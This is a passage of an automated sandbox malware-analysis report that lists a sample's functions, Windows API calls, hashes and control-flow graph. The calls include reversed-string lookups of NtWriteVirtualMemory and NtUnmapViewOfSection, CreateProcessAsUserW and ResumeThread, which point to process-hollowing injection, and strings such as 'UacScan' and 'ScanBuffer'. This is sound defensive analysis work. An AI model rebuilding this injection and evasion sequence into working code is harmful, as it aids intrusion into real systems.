                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 02D08274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02D082C7
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 02D08274: GetProcAddress.KERNEL32(?,?), ref: 02D082D9
                                                                                                                                                                                                                                                                                                                                                      • NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02D07DEC
                                                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1462328557.0000000002CF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1462273751.0000000002CF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1462595036.0000000002D1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002D77000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002E6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002E6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2cf0000_C6dAUcOA6M.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: HandleModule$AddressProc$MemoryVirtualWrite
                                                                                                                                                                                                                                                                                                                                                      • String ID: Ntdll$yromeMlautriVetirW
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 2719805696-3542721025
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: f46e8d3d209aa56ecaf373c9619af411ec886c9fd60d1d6b2d97a022b8f76b19
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: be2721e74c177dd1eaac4b2ea78e63ff646dedf4d02fa63f71b80c9416c6947d
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f46e8d3d209aa56ecaf373c9619af411ec886c9fd60d1d6b2d97a022b8f76b19
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 69012975740209AFEB54EFA8EC81F9BB7EEEB49700F504850BA04DB7A0D634AD149B64
                                                                                                                                                                                                                                                                                                                                                      Function 02D08670 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 43nativeCOMMON
                                                                                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 02D081CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02D0823C,?,?,00000000,?,02D07A7E,ntdll,00000000,00000000,02D07AC3,?,?,00000000), ref: 02D0820A
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 02D081CC: GetModuleHandleA.KERNELBASE(?), ref: 02D0821E
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 02D08274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02D082FC,?,?,00000000,00000000,?,02D08215,00000000,KernelBASE,00000000,00000000,02D0823C), ref: 02D082C1
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 02D08274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02D082C7
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 02D08274: GetProcAddress.KERNEL32(?,?), ref: 02D082D9
                                                                                                                                                                                                                                                                                                                                                      • NtUnmapViewOfSection.NTDLL(?,?), ref: 02D086D5
                                                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1462328557.0000000002CF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1462273751.0000000002CF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1462595036.0000000002D1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002D77000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002E6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002E6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2cf0000_C6dAUcOA6M.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: HandleModule$AddressProc$SectionUnmapView
                                                                                                                                                                                                                                                                                                                                                      • String ID: noitceSfOweiVpamnUtN$ntdll
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 3503870465-2520021413
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 48d9ea993ac580c9ae731fbfc45c7e238690d6c5d0c23916e80493ebac788498
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: d7ae60496f748428e9f463f6770e8e2df4bbb3cea8051df42b51b3733dab53aa
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 48d9ea993ac580c9ae731fbfc45c7e238690d6c5d0c23916e80493ebac788498
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0F016234A40304AFFB54EFA4EC81F5EB7AEEB49700F514860BA04D7790D634BD04EA64
                                                                                                                                                                                                                                                                                                                                                      Function 02D0DBB0 Relevance: 4.5, APIs: 3, Instructions: 47filenativeCOMMON
                                                                                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                      • RtlI.N(?,?,00000000,02D0DC7E), ref: 02D0DC2C
                                                                                                                                                                                                                                                                                                                                                      • RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,?,?,00000000,02D0DC7E), ref: 02D0DC42
                                                                                                                                                                                                                                                                                                                                                      • NtDeleteFile.N(?,00000000,?,00000000,00000000,?,?,00000000,02D0DC7E), ref: 02D0DC61
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1462328557.0000000002CF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1462273751.0000000002CF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1462595036.0000000002D1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002D77000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002E6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002E6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2cf0000_C6dAUcOA6M.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: Path$DeleteFileNameName_
                                                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 4284456518-0
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: a806a6130e5ad80ab4e070839caa3ad190fc82a77973422b81e39e31c2335883
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: 13a9cbd65658c4eb5edcf08f40111d9fb514640375cbed8b43c1af04b139600d
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a806a6130e5ad80ab4e070839caa3ad190fc82a77973422b81e39e31c2335883
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4A0162759446086EEB05DBE0DDC1FCD77BAEB48704F5144939240E62E1DAB4AF048B34
                                                                                                                                                                                                                                                                                                                                                      Function 02D0DC04 Relevance: 4.5, APIs: 3, Instructions: 45filenativeCOMMON
                                                                                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 02CF4F20: SysAllocStringLen.OLEAUT32(?,?), ref: 02CF4F2E
                                                                                                                                                                                                                                                                                                                                                      • RtlI.N(?,?,00000000,02D0DC7E), ref: 02D0DC2C
                                                                                                                                                                                                                                                                                                                                                      • RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,?,?,00000000,02D0DC7E), ref: 02D0DC42
                                                                                                                                                                                                                                                                                                                                                      • NtDeleteFile.N(?,00000000,?,00000000,00000000,?,?,00000000,02D0DC7E), ref: 02D0DC61
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 02CF4C60: SysFreeString.OLEAUT32(02D0F4A4), ref: 02CF4C6E
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1462328557.0000000002CF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1462273751.0000000002CF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1462595036.0000000002D1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002D77000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002E6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002E6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2cf0000_C6dAUcOA6M.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: PathString$AllocDeleteFileFreeNameName_
                                                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 1530111750-0
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: ff0b90ecb0fc565d10fb29cb3a9614c3110216f20ac88e63519f22ef5add8950
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: 324893896cacb73f19fa5ca556d31ade7b5bb2dd25967548d037b9541d7d6cd8
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ff0b90ecb0fc565d10fb29cb3a9614c3110216f20ac88e63519f22ef5add8950
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5101E17194020CBADB51EBE0DD92FCEB7BEEB48700F5144A2A605E26D0EA756F049A64
                                                                                                                                                                                                                                                                                                                                                      Function 02D06DC8 Relevance: 1.5, APIs: 1, Instructions: 48comCOMMON
                                                                                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 02D06D6C: CLSIDFromProgID.OLE32(00000000,?,00000000,02D06DB9,?,?,?,00000000), ref: 02D06D99
                                                                                                                                                                                                                                                                                                                                                      • CoCreateInstance.OLE32(?,00000000,00000005,02D06EAC,00000000,00000000,02D06E2B,?,00000000,02D06E9B), ref: 02D06E17
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1462328557.0000000002CF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1462273751.0000000002CF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1462595036.0000000002D1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002D77000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002E6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002E6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2cf0000_C6dAUcOA6M.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: CreateFromInstanceProg
                                                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 2151042543-0
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 01f1f3e319c07b55344d527fca591b706a0d04703541599aea1d948589f1efb8
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: f35d284527ef38c67f9d3e2379e94b705aa59b9dffcc4ce70a58811278bd98d4
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 01f1f3e319c07b55344d527fca591b706a0d04703541599aea1d948589f1efb8
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7801D4712087046EE715EF61EC92A6F7BADD749B00F514835F605E27A0E670DD2088B0
                                                                                                                                                                                                                                                                                                                                                      Function 02D18128 Relevance: 162.0, APIs: 5, Strings: 86, Instructions: 2778processthreadCOMMON
                                                                                                                                                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                                                                                                                      control_flow_graph 4574 2d18128-2d18517 call 2cf4860 call 2cf49a0 call 2cf46d4 call 2cf47ec call 2cf49a0 call 2cf46d4 call 2d089d0 call 2cf4860 call 2cf49a0 call 2cf46d4 call 2cf47ec call 2cf49a0 call 2cf46d4 call 2d089d0 call 2cf4860 call 2cf49a0 call 2cf46d4 call 2cf47ec call 2cf49a0 call 2cf46d4 call 2d089d0 call 2cf4860 call 2cf49a0 call 2cf46d4 call 2cf47ec call 2cf49a0 call 2cf46d4 call 2d089d0 call 2cf4860 call 2cf49a0 call 2cf46d4 call 2cf47ec call 2cf49a0 call 2cf46d4 call 2d089d0 call 2cf4860 call 2cf49a0 call 2cf46d4 call 2cf47ec call 2cf49a0 call 2cf46d4 call 2d089d0 call 2cf4860 call 2cf49a0 call 2cf46d4 call 2cf47ec call 2cf49a0 call 2cf46d4 call 2d089d0 call 2cf4860 call 2cf49a0 call 2cf46d4 call 2cf47ec call 2cf49a0 call 2cf46d4 call 2d089d0 call 2cf48ec 4689 2d193a1-2d19524 call 2cf4860 call 2cf49a0 call 2cf46d4 call 2cf47ec call 2cf49a0 call 2cf46d4 call 2d089d0 call 2cf4860 call 2cf49a0 call 2cf46d4 call 2cf47ec call 2cf49a0 call 2cf46d4 call 2d089d0 call 2cf4860 call 2cf49a0 call 2cf46d4 call 2cf47ec call 2cf49a0 call 2cf46d4 call 2d089d0 call 2cf48ec 4574->4689 4690 2d1851d-2d186f0 call 2cf4860 call 2cf49a0 call 2cf46d4 call 2cf47ec call 2cf49a0 call 2cf46d4 call 2d089d0 call 2cf4860 call 2cf49a0 call 2cf46d4 call 2cf47ec call 2cf49a0 call 2cf46d4 call 2d089d0 call 2cf4860 call 2cf49a0 call 2cf46d4 call 2cf47ec call 2cf49a0 call 2cf46d4 call 2d089d0 call 2cf47ec call 2cf49a0 call 2cf4d74 call 2cf4df0 CreateProcessAsUserW 4574->4690 4780 2d19cf5-2d1b2fa call 2cf4860 call 2cf49a0 call 2cf46d4 call 2cf47ec call 2cf49a0 call 2cf46d4 call 2d089d0 call 2cf4860 call 2cf49a0 call 2cf46d4 call 2cf47ec call 2cf49a0 call 2cf46d4 call 2d089d0 call 2cf4860 call 2cf49a0 call 2cf46d4 call 2cf47ec call 2cf49a0 call 2cf46d4 call 2d089d0 call 2cf46d4 * 2 call 2d089d0 call 2cf46d4 * 2 call 2d089d0 call 2cf46d4 * 2 call 2d089d0 call 2cf46d4 * 2 call 2d089d0 call 2cf4860 call 2cf49a0 call 2cf46d4 call 2cf47ec call 2cf49a0 call 2cf46d4 call 2d089d0 call 2cf4860 call 2cf49a0 call 2cf46d4 call 2cf47ec call 2cf49a0 call 2cf46d4 call 2d089d0 call 2cf4860 call 2cf49a0 call 2cf46d4 call 2cf47ec call 2cf49a0 call 2cf46d4 call 2d089d0 call 2cf46d4 * 2 call 2d089d0 call 2cf46d4 * 2 call 2d089d0 call 2cf46d4 * 2 call 2d089d0 call 2cf46d4 * 2 call 2d089d0 call 2cf46d4 * 2 call 2d089d0 call 2cf4860 call 2cf49a0 call 2cf46d4 call 2cf47ec call 2cf49a0 call 2cf46d4 call 2d089d0 call 2cf4860 call 2cf49a0 call 2cf46d4 call 2cf47ec call 2cf49a0 call 2cf46d4 call 2d089d0 call 2cf46d4 * 2 call 2d089d0 call 2cf4860 call 2cf49a0 call 2cf46d4 call 2cf47ec call 2cf49a0 call 2cf46d4 call 2d089d0 call 2cf4860 call 2cf49a0 call 2cf46d4 call 2cf47ec call 2cf49a0 call 2cf46d4 call 2d089d0 call 2cf4860 call 2cf49a0 call 2cf46d4 call 2cf47ec call 2cf49a0 call 2cf46d4 call 2d089d0 call 2cf46d4 * 2 call 2d089d0 call 2cf46d4 * 2 call 2d089d0 call 2cf46d4 * 2 call 2d089d0 call 2cf46d4 * 2 call 2d089d0 call 2cf4860 call 2cf49a0 call 2cf46d4 call 2cf47ec call 2cf49a0 call 2cf46d4 call 2d089d0 call 2cf4860 call 2cf49a0 call 2cf46d4 call 2cf47ec call 2cf49a0 call 2cf46d4 call 2d089d0 call 2cf46d4 * 2 call 2d089d0 call 2cf46d4 * 2 call 2d089d0 call 2cf46d4 * 2 call 2d089d0 call 2cf46d4 * 2 call 2d089d0 call 2cf46d4 * 2 call 2d089d0 call 2cf4860 call 2cf49a0 call 2cf46d4 call 2cf47ec call 2cf49a0 call 2cf46d4 call 2d089d0 call 2cf4860 call 2cf49a0 call 2cf46d4 call 2cf47ec call 2cf49a0 call 2cf46d4 call 2d089d0 call 2cf4860 call 2cf49a0 call 2cf46d4 call 2cf47ec call 2cf49a0 call 2cf46d4 call 2d089d0 call 2cf4860 call 2cf49a0 call 2cf46d4 call 2cf47ec call 2cf49a0 call 2cf46d4 call 2d089d0 call 2cf4860 call 2cf49a0 call 2cf46d4 call 2cf47ec call 2cf49a0 call 2cf46d4 call 2d089d0 * 16 call 2cf4860 call 2cf49a0 call 2cf46d4 call 2cf47ec call 2cf49a0 call 2cf46d4 call 2d089d0 call 2cf46d4 * 2 call 2d089d0 call 2cf46d4 * 2 call 2d089d0 call 2cf46d4 * 2 call 2d089d0 call 2cf46d4 * 2 call 2d089d0 call 2cf46d4 * 2 call 2d089d0 call 2cf46d4 * 2 call 2d089d0 call 2cf46d4 * 2 call 2d089d0 call 2cf4860 call 2cf49a0 call 2cf46d4 call 2cf47ec call 2cf49a0 call 2cf46d4 call 2d089d0 call 2cf4860 call 2cf49a0 call 2cf46d4 call 2cf47ec call 2cf49a0 call 2cf46d4 call 2d089d0 call 2cf4860 call 2cf49a0 call 2cf46d4 call 2cf47ec call 2cf49a0 call 2cf46d4 call 2d089d0 call 2cf46d4 * 2 call 2d089d0 call 2cf46d4 * 2 call 2d089d0 call 2cf46d4 * 2 call 2d089d0 call 2cf46d4 * 2 call 2d089d0 call 2cf46d4 * 2 call 2d089d0 call 2cf46d4 * 2 call 2d089d0 call 2cf46d4 * 2 call 2d089d0 call 2cf46d4 * 2 call 2d089d0 call 2cf46d4 * 2 call 2d089d0 call 2cf46d4 * 2 call 2d089d0 call 2cf46d4 * 2 call 2d089d0 call 2cf46d4 * 2 call 2d089d0 call 2cf46d4 * 2 call 2d089d0 call 2cf46d4 * 2 call 2d089d0 call 2cf46d4 * 2 call 2d089d0 call 2cf46d4 * 2 call 2d089d0 call 2cf46d4 * 2 call 2d089d0 call 2cf46d4 * 2 call 2d089d0 call 2cf46d4 * 2 call 2d089d0 call 2d07c10 call 2d08338 call 2cf4860 call 2cf49a0 call 2cf46d4 call 2cf47ec call 2cf49a0 call 2cf46d4 call 2d089d0 call 2cf4860 call 2cf49a0 call 2cf46d4 call 2cf47ec call 2cf49a0 call 2cf46d4 call 2d089d0 call 2cf4860 call 2cf49a0 call 2cf46d4 call 2cf47ec call 2cf49a0 call 2cf46d4 call 2d089d0 ExitProcess 4689->4780 4781 2d1952a-2d19539 call 2cf48ec 4689->4781 4799 2d186f2-2d18769 call 2cf4860 call 2cf49a0 call 2cf46d4 call 2cf47ec call 2cf49a0 call 2cf46d4 call 2d089d0 4690->4799 4800 2d1876e-2d18879 call 2cf4860 call 2cf49a0 call 2cf46d4 call 2cf47ec call 2cf49a0 call 2cf46d4 call 2d089d0 call 2cf4860 call 2cf49a0 call 2cf46d4 call 2cf47ec call 2cf49a0 call 2cf46d4 call 2d089d0 4690->4800 4781->4780 4788 2d1953f-2d19812 call 2cf4860 call 2cf49a0 call 2cf46d4 call 2cf47ec call 2cf49a0 call 2cf46d4 call 2d089d0 call 2cf4860 call 2cf49a0 call 2cf46d4 call 2cf47ec call 2cf49a0 call 2cf46d4 call 2d089d0 call 2cf4860 call 2cf49a0 call 2cf46d4 call 2cf47ec call 2cf49a0 call 2cf46d4 call 2d089d0 call 2d0f094 call 2cf4860 call 2cf49a0 call 2cf46d4 call 2cf4860 call 2cf49a0 call 2cf46d4 call 2cf47ec call 2cf49a0 call 2cf46d4 call 2d089d0 call 2cf4860 call 2cf49a0 call 2cf46d4 call 2cf47ec call 2cf49a0 call 2cf46d4 call 2d089d0 call 2cf7e5c 4781->4788 5046 2d19818-2d19aea call 2cf4860 call 2cf49a0 call 2cf46d4 call 2cf47ec call 2cf49a0 call 2cf46d4 call 2d089d0 call 2cf4860 call 2cf49a0 call 2cf46d4 call 2cf47ec call 2cf49a0 call 2cf46d4 call 2d089d0 call 2cf4860 call 2cf49a0 call 2cf46d4 call 2cf47ec call 2cf49a0 call 2cf46d4 call 2d089d0 call 2d0e358 call 2cf4530 call 2cf4860 call 2cf49a0 call 2cf46d4 call 2cf47ec call 2cf49a0 call 2cf46d4 call 2d089d0 call 2cf4860 call 2cf49a0 call 2cf46d4 call 2cf47ec call 2cf49a0 call 2cf46d4 call 2d089d0 call 2cf4de0 * 2 call 2cf4764 call 2d0dc8c 4788->5046 5047 2d19aef-2d19cf0 call 2cf4860 call 2cf49a0 call 2cf46d4 call 2cf47ec call 2cf49a0 call 2cf46d4 call 2d089d0 call 2cf4860 call 2cf49a0 call 2cf46d4 call 2cf47ec call 2cf49a0 call 2cf46d4 call 2d089d0 call 2cf4860 call 2cf49a0 call 2cf46d4 call 2cf47ec call 2cf49a0 call 2cf46d4 call 2d089d0 call 2cf4860 call 2cf49a0 call 2cf46d4 call 2cf47ec call 2cf49a0 call 2cf46d4 call 2d089d0 call 2cf49f8 call 2d08d70 4788->5047 4799->4800 4900 2d18880-2d18ba0 call 2cf49f8 call 2d0de50 call 2cf4860 call 2cf49a0 call 2cf46d4 call 2cf47ec call 2cf49a0 call 2cf46d4 call 2d089d0 call 2cf4860 call 2cf49a0 call 2cf46d4 call 2cf47ec call 2cf49a0 call 2cf46d4 call 2d089d0 call 2cf4860 call 2cf49a0 call 2cf46d4 call 2cf47ec call 2cf49a0 call 2cf46d4 call 2d089d0 call 2d0d164 call 2cf4860 call 2cf49a0 call 2cf46d4 call 2cf47ec call 2cf49a0 call 2cf46d4 call 2d089d0 call 2cf4860 call 2cf49a0 call 2cf46d4 call 2cf47ec call 2cf49a0 call 2cf46d4 call 2d089d0 call 2cf4860 call 2cf49a0 call 2cf46d4 call 2cf47ec call 2cf49a0 call 2cf46d4 call 2d089d0 4800->4900 4901 2d1887b-2d1887e 4800->4901 5217 2d18ba2-2d18bb4 call 2d08730 4900->5217 5218 2d18bb9-2d1939c call 2cf4860 call 2cf49a0 call 2cf46d4 call 2cf47ec call 2cf49a0 call 2cf46d4 call 2d089d0 call 2cf4860 call 2cf49a0 call 2cf46d4 call 2cf47ec call 2cf49a0 call 2cf46d4 call 2d089d0 call 2cf4860 call 2cf49a0 call 2cf46d4 call 2cf47ec call 2cf49a0 call 2cf46d4 call 2d089d0 ResumeThread call 2cf4860 call 2cf49a0 call 2cf46d4 call 2cf47ec call 2cf49a0 call 2cf46d4 call 2d089d0 call 2cf4860 call 2cf49a0 call 2cf46d4 call 2cf47ec call 2cf49a0 call 2cf46d4 call 2d089d0 call 2cf4860 call 2cf49a0 call 2cf46d4 call 2cf47ec call 2cf49a0 call 2cf46d4 call 2d089d0 CloseHandle call 2cf4860 call 2cf49a0 call 2cf46d4 call 2cf47ec call 2cf49a0 call 2cf46d4 call 2d089d0 call 2cf4860 call 2cf49a0 call 2cf46d4 call 2cf47ec call 2cf49a0 call 2cf46d4 call 2d089d0 call 2cf4860 call 2cf49a0 call 2cf46d4 call 2cf47ec call 2cf49a0 call 2cf46d4 call 2d089d0 call 2cf4860 call 2cf49a0 call 2cf46d4 call 2cf47ec call 2cf49a0 call 2cf46d4 call 2d089d0 call 2cf4860 call 2cf49a0 call 2cf46d4 call 2cf47ec call 2cf49a0 call 2cf46d4 call 2d089d0 call 2cf4860 call 2cf49a0 call 2cf46d4 call 2cf47ec call 2cf49a0 call 2cf46d4 call 2d089d0 call 2cf4860 call 2cf49a0 call 2cf46d4 call 2cf47ec call 2cf49a0 call 2cf46d4 call 2d089d0 call 2d08080 call 2d0894c * 6 CloseHandle call 2cf4860 call 2cf49a0 call 2cf46d4 call 2cf47ec call 2cf49a0 call 2cf46d4 call 2d089d0 call 2cf4860 call 2cf49a0 call 2cf46d4 call 2cf47ec call 2cf49a0 call 2cf46d4 call 2d089d0 4900->5218 4901->4900 5046->5047 5047->4780 5217->5218 5218->4689
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 02D089D0: FreeLibrary.KERNEL32(75470000,00000000,00000000,00000000,00000000,02D7738C,Function_0000662C,00000004,02D7739C,02D7738C,05F5E103,00000040,02D773A0,75470000,00000000,00000000), ref: 02D08AAA
                                                                                                                                                                                                                                                                                                                                                      • CreateProcessAsUserW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,02E6B7E0,02E6B824,OpenSession,02D77380,02D1B7B8,UacScan,02D77380), ref: 02D186E9
                                                                                                                                                                                                                                                                                                                                                      • ResumeThread.KERNEL32(00000000,ScanBuffer,02D77380,02D1B7B8,OpenSession,02D77380,02D1B7B8,UacScan,02D77380,02D1B7B8,ScanBuffer,02D77380,02D1B7B8,OpenSession,02D77380,02D1B7B8), ref: 02D18D33
                                                                                                                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,ScanBuffer,02D77380,02D1B7B8,OpenSession,02D77380,02D1B7B8,UacScan,02D77380,02D1B7B8,00000000,ScanBuffer,02D77380,02D1B7B8,OpenSession,02D77380), ref: 02D18EB2
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 02D0894C: LoadLibraryW.KERNEL32(bcrypt,?,00000908,00000000,02D773A8,02D0A587,ScanString,02D773A8,02D0A93C,ScanBuffer,02D773A8,02D0A93C,Initialize,02D773A8,02D0A93C,UacScan), ref: 02D08960
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 02D0894C: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02D0897A
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 02D0894C: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000908,00000000,02D773A8,02D0A587,ScanString,02D773A8,02D0A93C,ScanBuffer,02D773A8,02D0A93C,Initialize), ref: 02D089B6
                                                                                                                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,00000000,ScanBuffer,02D77380,02D1B7B8,UacInitialize,02D77380,02D1B7B8,ScanBuffer,02D77380,02D1B7B8,OpenSession,02D77380,02D1B7B8,UacScan,02D77380), ref: 02D192A4
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 02CF7E5C: GetFileAttributesA.KERNEL32(00000000,?,02D1041F,ScanString,02D77380,02D1B7B8,OpenSession,02D77380,02D1B7B8,ScanString,02D77380,02D1B7B8,UacScan,02D77380,02D1B7B8,UacInitialize), ref: 02CF7E67
